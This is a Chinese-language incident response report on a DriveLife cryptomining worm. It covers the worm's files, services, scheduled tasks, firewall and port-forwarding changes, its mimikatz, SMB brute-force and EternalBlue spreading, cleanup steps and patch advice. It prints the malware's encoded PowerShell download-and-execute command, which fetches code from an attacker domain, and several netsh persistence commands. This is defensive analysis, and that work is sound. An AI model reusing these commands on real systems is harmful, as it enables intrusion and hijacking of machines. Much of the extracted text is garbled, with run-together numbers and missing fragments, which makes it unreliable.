2021挖矿病毒应急响应报告

挖矿病毒应急响应报告2021目录前言 3背景 3术语表 4病毒特征 5病毒文件 5系统服务 6Ddriver 6WebServers 6计划任务 7Ddrivers 7DnsScan 8WebServers 8Bluetooths 8手工清除方法 9计划任务或服务 9病毒文件 9注册表 9防火墙或端口转发 10病毒分析 10主程序 10释放并配置 104.1.2挖矿 14横向传播程序 16反编译 174.2.2解包 184.2.3传播过程 19升级程序 24应对措施及建议 25威胁指标（IOCS） 266.1MD5 266.2DOMAIN 266.3IP 26URL 26弱口令 26参考资料 28前言背景2019423XXX200DCS经研究分析发现，该病毒为驱动人生挖矿病毒的一种，它通过“永恒之SMB矿操作。20181214不断增强。下表是该团伙主要活动情况的时间线：表1驱动人生黑产团伙活动时间线序号时间木马行为变化120181214利用“驱动人生”系列软件升级通道下发，利用“永恒之蓝”漏洞攻击传播。220181219下发之后的木马新增PowerShell后门安装。32019年1月09日检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。42019年1月24日木马将挖矿组件、升级后门组件分别安装为计划任务，并同时安装PowerShell后门。52019年1月25日124件安装为计划任务，在攻击时新增利用mimikatz，SMBPowerShellmshta划任务。62019年2月10日将攻击模块打包方式改为Pyinstaller。72019年2月20日XMRig进程启动挖矿。82019年2月23日攻击方法再次更新，新增MSSQL爆破攻击。92019年2月25日223MSSQL攻击方法集成永恒之蓝漏洞攻击、SMB击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击。102019328225CPU相关的驱动，使用显卡进行挖矿。由此可见，中石化某炼化厂的病毒比较符合2019年2月10日版本。术语表定义本报告中涉及的重要术语，为读者在阅读报告时提供必要的参考信息。表2术语表序号术语或缩略语说明性定义1mimikatzmimikatzCWindowsKerberospass-the-hash、pass-the-ticket、buildGoldentickets2PowerShellWindowsPowerShell是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用.NETFramework的强大功能。3PSEXECpsexec是一个远程执行工具，你可以像使用telnet一样使用它。4PyinstallerPyInstallerPythonPython释器或任何模块即可运行打包的应用程序。5PythonPython语言新功能的添加，越来越多被用于独立的、大型项目的开发。6驱动人生驱动人生是一款免费的驱动管理软件，实现智能检测硬件并自动查找安装驱动，为用户提供最新驱动更新，本机驱动备份、还原和卸载等功能。7永恒之蓝2017414ShadowBrokers（影子经纪人）络攻击工具，其中包含“永恒之蓝”工具，WindowsSMB以获取系统最高权限。病毒特征病毒文件当前版本病毒感染过程中，所产生的病毒文件如下表所示：表3病毒相关文件序号文件位置及名称功能与作用1C:\Windows\system32\svhost.exe主程序。2C:\Windows\SysWOW64\svhost.exe3C:\Windows\system32\drivers\svchost.exe4C:\Windows\SysWOW64\drivers\svchost.exe5C:\Windows\temp\svvhost.exe横向传播程序。6C:\Windows\temp\svchost.exe7C:\Windows\system32\wmiex.exe后门程序。8C:\Windows\SysWOW64\wmiex.exe9C:\Windows\system32\drivers\taskmgr.exe任务管理器伪装程序。10C:\Windows\SysWOW64\drivers\taskmgr.exe11C:\Windows\temp\m.ps1mimikatz程序。12C:\Windows\temp\mkatz.inimimikatz结果。13C:\Windows\temp\p.bat“永恒之蓝”漏洞横向传播产生的脚本文件。14C:\installed.exe“永恒之蓝”漏洞横向传播的主程序。15$env:temp\update.exe主程序的更新文件。系统服务当前版本病毒共安装两个服务，分别是Ddriver、WebServers。DdriverDdriver云控指令，其服务信息如下：服务名：Ddriver可执行文件路径：C:\Windows\system32\drivers\svchost.exe图1服务Ddriver（注：本图为后期复现所截）WebServersWebServerswmiex.exe，他文件、上报信息、管理服务进程，其服务信息如下：服务名：WebServers可执行文件路径：C:\Windows\system32\wmiex.exe图2服务WebServers（注：本图为后期复现所截）计划任务当前版本病毒共安装四个计划任务，如下图所示：图3计划任务DdriversDdriversDdriver征如下：计划任务名：Ddrivers启动路径：cmd.exe/cC:\Windows\system32\drivers\svchost.exe00:50:00DnsScanDnsScanSMB口令爆破、PSEXEC、MimiKatz计划任务名：DnsScan启动程序：C:\Windows\Temp\svchost.exe1WebServersWebServerswmiex.exe，WebServers计划任务名：WebServers启动程序：cmd.exe/cC:\Windows\system32\wmiex.exe00:50:00Bluetooths计划任务\Microsoft\windows\Bluetooths是负责下载执行远程Powershell指令，其特征如下：计划任务名：Bluetooths启动程序：powershell-epbypass-eSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=00:50:00-epbypass–eIEX(New-ObjectNet.WebClient).downloadstring('/v'+$env:USERDOMAIN))手工清除方法计划任务或服务需删除计划任务，结束病毒进程并删除服务，具体如下：DdriversWebServersDnsScan删除名为\Microsoft\Windows\Bluetoothswmiex.exe“svchost”svchostsvchost“WindowsDdriverWebServers病毒文件需删除下载或释放的病毒文件，路径如下：C:\Windows\system32\svhost.exeC:\Windows\SysWOW64\svhost.exeC:\Windows\system32\drivers\svchost.exeC:\Windows\SysWOW64\drivers\svchost.exeC:\Windows\temp\svvhost.exeC:\Windows\temp\svchost.exeC:\Windows\system32\wmiex.exeC:\Windows\SysWOW64\wmiex.exeC:\Windows\system32\drivers\taskmgr.exeC:\Windows\SysWOW64\drivers\taskmgr.exeC:\Windows\temp\m.ps1C:\Windows\temp\mkatz.iniC:\Windows\temp\p.batC:\installed.exe$env:temp\update.exe注册表需删除病毒创建的注册表项：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DdriverHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebServers防火墙或端口转发需删除病毒设置的防火墙栏目有：UDP，65532UDP2，65531ShareService，65533需删除病毒设置的端口转发的设置，CMDnetshinterfaceportproxydeletev4tov4listenport=65531netshinterfaceportproxydeletev4tov4listenport=65532病毒分析主程序C:\Windows\system32\driverssvchost.exe，IDA释放并配置Ddriver染配置行为。图4主函数入口svhostsvchost.exe，svhostsvchost.exePEC:\Windows\temp\ttt.exe，释放完成后便执行该文件。图5释放主程序中102号资源文件图6加密状态的102号资源文件ttt.execmd的挖矿程序，为新版挖矿程序的安装和运行清理环境。图7结束或删除老版的挖矿程序Windows65531，65532，65533UDP2，UDP，ShareService，65532的流量转发到地址的53端口，将来自65531端口的流量转发到地址的53端口。图8Windows防火墙中的增项图9端口代理C:\Windows\system32\svhost.exeC:\Windows\system32\drivers\svchost.exe，之后设置计划任务同时设置注册表项，实现程序的开机启动和定期触发执行。图10拷贝主程序文件到系统关键目录下图11设置计划任务和注册表项CreateServiceACreateServiceACMDsccreatenetstartStartServiceA服务函数。图12创建Ddriver服务挖矿服务主函数中首先根据系统位数拼接后续将要使用到的字符串资源，包括从而已域名临时下载的文件以及解密之后的文件，和后续用来伪装成任务管理器共享进程进行挖矿操作taskmgr.exe。图13拼接后续需要使用的字符串创建名为“itisholyshit”的互斥体防止进程重复启动运行，根据系统位数解密释放对应的资源文件，64100，32101C:\Windows\system32\drivers\taskmgr.exe（64位系统：C:\Windows\SysWOW64\drivers\taskmgr.exe）。图14根据系统位数释放taskmgr.exe文件之后创建4个线程分别进行相关的恶意操作：taskmgr.exe，使其不被用户发现；10sC:\Windows\temp\svchost.exe（文件），实现内网的横向感染传播；Wmic10程；65533图15根据主机进程决定是否暂时关闭伪装进程图16使用WMIC检查进程并决定是否关闭挖矿程序C:\Windows\temp\ttt.exeWebServers，WebServers图17释放的ttt.exe文件被移动到指定路径横向传播程序在C:\Windows\Temp目录中发现svchost.exe文件，如下图所示：图18横向传播程序右键查看其属性，如下图所示：图19横向传播程序文件属性反编译将svchost.exe拖进IDA进行反编译，如下图所示：图20横向传播程序入口函数通过阅读汇编代码并无大发现。view->opensubview->string如下图所示：图21字符串资源MSVCR90.dll、KERNEL32.dll、PYTHON27.DLLDLLPythonPyinstaller解包使用工具python-exe-unpacker（下载地址：/security/python-exe-unpacker）对svchost.exe进行解包，如下图所示：图22将exe文件解包成python解包后，共有两个文件，分别是：ii.py.py、ii.py.pyc，ii.py.py是源代码文件，ii.py.pyc是源代码编译后文件。Python程序ii.py.py的程序结构如下图所示：图23横向传播程序的结构传播过程通过阅读与分析Python程序ii.py.py，其横向传播过程如下图所示：图24横向传播过程svchost.exe60124svchost.exe。然后，svchost.exek8h3d除。图25删除k8h3d用户然后，svchost.exe将会检测本机是否已感染，如果本机已经被感染，则读取本地病毒文件。图26检测本机是否感染然后，svchost.exepowershell，DnsScan、\Microsoft\windows\BluetoothsAutocheck5050C:\Windows\temp\svchost.exe图27利用mimikatz提取内存中的密码和凭证然后，svchost.exeC:\Windows\temp\m.ps1powershellmimikatzCats.ps1的代码一致。然后，svchost.exeC:\Windows\temp\m.ps1，系统内存中提取明文密码、哈希、PINKerberosC:\Windows\temp\mkatz.ini，如下图所示：图28提取出的密码信息然后，svchost.exewmicntdomaingetdomainname然后，svchost.exefind_ipipconfig/allnetstat-naip、网段等信息。图29获取IP或IP段SMB用两种。图30爆破SMB服务scansmbscan2445、6553365533validate图31通过SMB服务横向传播validateSMB破。如果爆破成功，将本横向传播程序复制到被攻击的主机中并运行。除此之外，svchost.exe将会通过“永恒之蓝”漏洞进行传播。图32“永恒之蓝”漏洞横向传播check_thread图33利用“永恒之蓝”漏洞横向传播文件smb_pwnC:\installed.exeC:\Windows\temp\p.bat图34利用“永恒之蓝”漏洞执行命令脚本C:\Windows\temp\p.bat的主要作用有：命令netshinterfaceipv6installipv6；命令netshfirewalladdportopeningtcp65532DNS265532命令netshinterfaceportproxyaddv4tov4listenport=65532connectaddress=connectport=53655353d)同理，它将开启65531端口，并将其转发至:53;随后将创建\Microsoft\windows\Bluetooths、Autocheck务；Ddrivercmd.exe10k8h3dC:\Windows\temp\p.bat到此为止，病毒的横向传播就结束了。升级程序计划任务\Microsoft\windows\Bluetooths50PowerShell通过分析脚本代码，发现它是经过多层混淆，解密后的内容如下图所示：它的主要作用是：

图35升级程序脚本Maczhudongfangyu等信息；Ddriver$env:temp\update.exe并运行；感染后，收集主机信息并发送到远程服务器，收集的信息包括主机ID，GUID，MAC，CPU程服务器。应对措施及建议码；主机使用高强度密码，切勿使用弱口令，防止黑客暴力破解；内网使用共享的主机打上“永恒之蓝”漏洞补丁（4），防止利用此漏洞的横向攻击；表4“永恒之蓝”漏洞补丁序号Windows系统版本补丁编号1Windows2000SP4无2WindowsXPSP3KB40125983WindowsServer2003SP2KB40125984WindowsVistaSP2KB40125985Windows7SP1KB4012212、KB40122156WindowsServer2008SP2KB40119817WindowsServer2008R2SP1KB4012212、KB40122158Wind